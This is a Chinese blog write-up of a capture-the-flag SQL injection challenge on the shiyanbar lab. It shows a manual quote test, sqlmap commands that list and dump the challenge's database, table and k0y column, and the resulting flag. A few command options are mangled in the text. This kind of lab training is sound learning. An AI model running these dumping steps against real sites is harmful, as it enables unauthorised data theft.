您现在的位置是：首页 > 文章详情

这个看起来有点简单!——实验吧

日期：2018-06-07点击：542收藏

今天有点时间就多写几篇解题思路吧，

希望能够帮助到那些需要帮助的人，

所有的wp都是以一题一篇的形式写出

主要是为了能够让读者更好的阅读以及查找，

希望你们不要责怪！！共勉！！！

这一题做的时间比较久，但是收获颇多！！！！

永远爱你们的————新宝宝

很明显。过年过节不送礼，送礼就送这个

格式：

解题链接： http://ctf5.shiyanbar.com/8/index.php?id=1

解题思路：看过视频之后，按照视频的教程解答可是怎么做就是不对，最后发现注入的网址不正确（QAQ），虽然浪费了很长的时间但是总的来说还是值得的；

首先：需要对这个网址进行手工检测是否存在sql注入（经典id=1'加入单引号提交,结果:

如果出现错误提示，则该网站可能就存在注入漏洞）使用sqlmap爆出当前数据库：

使用命令：python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db得到当前数据库：my_db

发现可能存在key于是输入命令：

python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db—tables

得到：

再继续：

python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey –columns就会得到：

然后把k0y里面值爆出来就好：需要输入：

python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump

最后得到答案：whatiMyD91dump

您可以考虑给博主来个小小的打赏以资鼓励，您的肯定将是我最大的动力。

关于作者：潜心于网络安全学习。如有问题或建议，请多多赐教！

特此声明：所有评论和私信都会在第一时间回复。也欢迎园子的大大们指正错误，共同进步。或者直接私信我

声援博主：如果您觉得文章对您有帮助，可以点击文章右下角【推荐】一下。您的鼓励是作者坚持原创和持续写作的最大动力！

关注公众号

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。

持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

转载内容版权归作者及来源网站所有，本站原创内容转载请注明来源。

Java分享